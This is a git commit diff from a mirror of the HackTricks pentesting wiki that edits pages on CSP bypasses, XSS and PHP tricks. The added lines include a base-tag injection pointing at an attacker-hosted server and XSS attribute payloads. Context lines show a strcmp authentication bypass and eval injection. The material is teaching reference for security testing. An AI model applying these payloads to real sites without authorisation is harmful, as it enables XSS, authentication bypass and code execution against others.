mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GitBook: [#3070] No subject
This commit is contained in:
parent
a7086a6c4a
commit
5346a4c5e6
8 changed files with 31 additions and 16 deletions
BIN
.gitbook/assets/image (465) (2) (1).png
Normal file
BIN
.gitbook/assets/image (465) (2) (1).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 1.7 MiB |
Binary file not shown.
Before Width: | Height: | Size: 1.7 MiB After Width: | Height: | Size: 34 KiB |
Binary file not shown.
Before Width: | Height: | Size: 34 KiB After Width: | Height: | Size: 111 KiB |
|
@ -194,6 +194,17 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.
|
|||
[iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### missing **base-uri**
|
||||
|
||||
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](dangling-markup-html-scriptless-injection.md).
|
||||
|
||||
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
|
||||
****If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
|
||||
|
||||
```html
|
||||
<base href="https://www.attacker.com/">
|
||||
```
|
||||
|
||||
### AngularJS events
|
||||
|
||||
Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this:
|
||||
|
|
|
@ -202,8 +202,9 @@ If you just think that **it's impossible to create an HTML tag with an attribute
|
|||
If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\
|
||||
If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_):
|
||||
|
||||
```javascript
|
||||
```bash
|
||||
" autofocus onfocus=alert(document.domain) x="
|
||||
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
|
||||
```
|
||||
|
||||
#### Style events
|
||||
|
|
|
@ -55,7 +55,7 @@ var_dump(in_array(0, $values, true));
|
|||
//False
|
||||
```
|
||||
|
||||
### **strcmp()/**strcasecmp()
|
||||
### strcmp()/strcasecmp()
|
||||
|
||||
If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check:
|
||||
|
||||
|
@ -133,17 +133,13 @@ $obfs += ""; //int 7
|
|||
|
||||
## More tricks
|
||||
|
||||
**register\_globals**: En PHP < 4.1.1 o si se ha configurado mal puede ser que las register\_globals estén activas (o se esté imitando su comportamiento). Esto implica que en variables globales como $\_GET si estas poseen un valor por ejemplo $\_GET\["param"]="1234", puedes acceder a este mediante $param. Por lo tanto, enviando parámetros de Get o Post se pueden sobreescribir variables que se usan dentro del código.
|
||||
* **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code. 
|
||||
* The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\
|
||||
This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2).
|
||||
* When you have the **usernames** of the users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
|
||||
* [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)
|
||||
|
||||
Las **variables de sesión** (asociadas al **PHPSESSION**) de un dominio se guardan en el mismo sitio, por lo tanto si dentro de un dominio se usan distintas cookies en distintos paths se puede hacer que un path acceda a la cookie del otro accediendo a dicho path con la cookie del otro. De esta forma si los dos paths acceden a una variable con el mismo nombre puedes hacer que el valor de dicha variable en el path1 se aplique al path2. Y entonces el path2 tomará como válidas las variables del path1 (al ponerle a la cookie el nombre que le corresponde en el path2).
|
||||
|
||||
Dos usuarios generados a la vez pueden tener la misma cookie (si la cookie depende del tiempo).
|
||||
|
||||
When you have the **usernames** of teh users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
|
||||
|
||||
****[**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)****
|
||||
|
||||
### **password\_hash/**password\_verify
|
||||
### password\_hash/password\_verify
|
||||
|
||||
This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\
|
||||
The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
|
||||
|
@ -156,6 +152,13 @@ $cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("
|
|||
True
|
||||
```
|
||||
|
||||
### HTTP headers bypass abusing PHP errors
|
||||
|
||||
If a **PHP page is printing errors and echoing back some input provided by the user**, the user can make the PHP server print back some **content long enough** so when it tries to **add the headers** into the response the server will throw and error.\
|
||||
In the following scenario the **attacker made the server throw some big errors**, and as you can see in the screen when php tried to **modify the header information, it couldn't** (so for example the CSP header wasn't sent to the user):
|
||||
|
||||
![](<../../../.gitbook/assets/image (465).png>)
|
||||
|
||||
## Code execution
|
||||
|
||||
**system("ls");**\
|
||||
|
@ -194,7 +197,7 @@ Esta función dentro de php permite ejecutar código que está escrito en un str
|
|||
|
||||
El caso es que hay que romper la query, ejecutar algo y volver a arreglarla (para ello nos servimos del "and" o "%26%26" o "|" --> el "or", "||" no funcionan pues si la primera es cierta deja de ejecutar y el ";" no funciona pues solo ejecuta la primera parte).
|
||||
|
||||
**Other option** is to add to the string the execution of the command: _'.highlight\_file('.passwd').'_
|
||||
**Other option** is to add to the string the execution of the command: _'.highlight\_file('.passwd').'_
|
||||
|
||||
**Other option** (if you have the internal code) is to modify some variable to alter the execution: _$file = "hola"_
|
||||
|
||||
|
@ -270,7 +273,7 @@ echo "$x ${Da}"; //Da Drums
|
|||
|
||||
## Xdebug unauthenticated RCE
|
||||
|
||||
If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit) 
|
||||
If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)
|
||||
|
||||
## Execute PHP without letters
|
||||
|
||||
|
|
|
@ -55,7 +55,7 @@ To connect with the bus pirate you can follow the docs:
|
|||
|
||||
In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
|
||||
|
||||
![](<../../.gitbook/assets/image (465) (2).png>)
|
||||
![](<../../.gitbook/assets/image (465) (2) (1).png>)
|
||||
|
||||
To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
|
||||
In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
|
||||
|
|
|
@ -14,7 +14,7 @@ In settings (the second tab button) you can select the **SDR device** or **selec
|
|||
|
||||
In the GUI behaviour it's recommended to enable a few things if your PC support it:
|
||||
|
||||
![](<../../.gitbook/assets/image (465).png>)
|
||||
![](<../../.gitbook/assets/image (465) (2).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
|
||||
|
|
Loading…
Reference in a new issue